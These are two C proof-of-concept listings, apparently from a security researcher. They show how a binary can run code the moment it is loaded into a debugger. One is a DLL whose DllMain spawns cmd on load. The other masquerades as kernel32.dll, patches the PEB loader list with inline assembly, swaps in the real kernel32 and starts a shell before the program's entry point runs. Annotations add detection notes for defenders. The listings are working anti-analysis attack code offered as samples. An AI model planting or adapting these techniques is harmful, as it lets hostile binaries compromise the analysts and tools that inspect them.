/* -------------------------------------------------------------------------
 - PREDEBUG 1 - The Autoexecute DLL [ DLL PART ]
 -
 - Sample showing code execution upon loading in a debugger
 - PREDEBUG loads its own dll that has initialization code
 - This code will be executed before control is passed back
 - to the debugger
 -
 - brett.moore@security-assessment.com
 ------------------------------------------------------------------------- */
#include "stdafx.h"
#include "process.h"

/*
 * Exported function; it exists only so that the module has at least one
 * export and looks like an ordinary DLL.  Always returns TRUE.
 * (The C-linkage prototype and the plain redeclaration below are redundant
 * with each other; kept as in the original listing.)
 */
extern "C" int __declspec(dllexport) myfunc(void);
int myfunc();

int myfunc()
{
    return TRUE;
}

/*
 * DllMain is invoked by the loader for every attach/detach notification.
 * ul_reason_for_call is never inspected, so the body runs on each of them,
 * and hModule / lpReserved are unused.
 *
 * The whole point of the sample is the single statement below: a shell is
 * spawned via system("cmd") as a side effect of the image being mapped,
 * i.e. while the loader lock is held and before a debugger attached to the
 * process regains control.  Nothing here is specific to debuggers -- any
 * tool that maps an untrusted module into a live process gives it this
 * opportunity.
 *
 * Defender's note: analyse untrusted modules with static tooling or inside
 * an isolated VM rather than by loading them into a live debugger, and treat
 * a child process created out of a debuggee's loader as a detection signal.
 */
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved )
{
    system("cmd");
    return TRUE;
}

/* -------------------------------------------------------------------------
 - PREDEBUG 2 - The Kernel32 DLL Replacement
 -
 - Sample showing code execution upon loading in a debugger
 - PREDEBUG loads its own copy of kernel32 which alters the
 - entry address, removes the copy and loads the real
 - kernel32.dll
 -
 - When compiled and loaded into a debugger, this code will
 - cause a cmd.exe shell to be started before the executables
 - entry point is reached.
 -
 - Needs to be compiled without optimisation
 -
 - brett.moore@security-assessment.com
 ------------------------------------------------------------------------- */
#define _WIN32_WINNT 0x501
// NOTE(review): the two include targets were lost when the listing was
// extracted (angle-bracketed names stripped); presumably <windows.h> and
// <stdio.h> -- confirm against the original source.
#include
#include

// Included From winternl.h
// Minimal local definition of the native UNICODE_STRING so that the
// RtlInitUnicodeString / LdrLoadDll prototypes below can be declared
// without pulling in the DDK headers.
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;

// Function pointers filled in at run time from ntdll.dll by predebug().
// (Note the variable is spelled LdrLoadDl; the export it is bound to is
// "LdrLoadDll".)  These native loader entry points are used because the
// kernel32.dll wrappers are not available -- this image is standing in for
// kernel32 at the time predebug() runs.
VOID (__stdcall *LdrLoadDl)( IN PWCHAR PathToFile OPTIONAL, IN ULONG Flags OPTIONAL, IN PUNICODE_STRING ModuleFileName, OUT PHANDLE ModuleHandle );
VOID (__stdcall *LdrUnloadDll)( HINSTANCE pInstance );
VOID (__stdcall *RtlInitUnicodeString)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString );

/*
 * Runs in place of the program's normal start-up because this image has been
 * loaded where kernel32.dll is expected (see the header comment).  How control
 * reaches predebug() -- the "altered entry address" the header mentions -- is
 * not shown on this page.
 *
 * Sequence, in order (the order and the inline asm are load-bearing, which is
 * why the header says to build without optimisation):
 *   1. resolve LdrLoadDll / LdrUnloadDll / RtlInitUnicodeString from ntdll;
 *      the GetModuleHandle / GetProcAddress results are not checked, so a
 *      failed lookup would dereference NULL a few lines later;
 *   2. patch the loader's bookkeeping entry for this module so that the
 *      loader will agree to unload it (the _asm block);
 *   3. unload this module and load the genuine kernel32.dll through the
 *      native Ldr API;
 *   4. spawn cmd.exe in a new console and terminate the process, so main()
 *      below is never reached in the demonstrated scenario.
 *
 * Defender's note: a process whose first "kernel32.dll" is not the system
 * copy, or which unloads and immediately reloads kernel32, is a strong
 * anomaly for module-load telemetry; the same goes for a shell spawned
 * before the image's own entry point has executed.
 */
void predebug()
{
    HMODULE hMod;
    UNICODE_STRING nString;
    STARTUPINFO si;
    PROCESS_INFORMATION pi;

    // Grab the API addresses we require (return values unchecked)
    hMod = GetModuleHandle("ntdll.dll");
    LdrLoadDl = (void *) GetProcAddress(hMod, "LdrLoadDll");
    LdrUnloadDll = (void *) GetProcAddress(hMod, "LdrUnloadDll");
    RtlInitUnicodeString = (void *) GetProcAddress( hMod,"RtlInitUnicodeString");

    // Init the unicode string naming the module to load in step 3
    RtlInitUnicodeString(&nString,L"kernel32.dll");

    // Removes the 'system dll' check: walks the PEB's loader data to the
    // entry for this module and rewrites its load count so the loader will
    // unload it on request.  x86-only, and tied to the loader structure
    // layout of the Windows versions this sample targeted (see _WIN32_WINNT
    // above) -- the offsets are not valid on other versions.
    _asm{
        mov esi,fs:0x30            // Get Peb
        add esi,0x0c               // Move to PPROCESS_MODULE_INFO
        lodsd                      // Get the pointer into EAX
        mov esi,[eax + 0x1c]       // InInitializationOrderModuleList
        lodsd                      // Grab Next Pointer in eax
        mov word ptr [eax+0x28],01 // Overwrite the 'load count'
    }

    // Get the address of our dll (the stand-in image, assumed to have been
    // loaded under this name)
    hMod = GetModuleHandle("predebug.dll");

    // Unload it
    LdrUnloadDll(hMod);

    // Load the real kernel32.dll (hMod is reused for the new handle)
    LdrLoadDl(NULL,NULL,&nString,&hMod);

    // We are now in a state where we can execute code normally.
    // Hard-coded NT/2000-era path; bInheritHandles is TRUE; the return value
    // is not checked.
    GetStartupInfo(&si);
    CreateProcess("c:\\winnt\\system32\\cmd.exe", NULL, NULL, NULL, TRUE,CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);

    // Terminate here; the host executable's own code never runs.
    ExitProcess(1);
}

/*
 * Placeholder entry point of the host executable.  Unreachable in the
 * demonstrated scenario because predebug() calls ExitProcess first; argc
 * and argv are unused.
 */
int main(int argc, char *argv[])
{
    printf("Hello World....\n");
}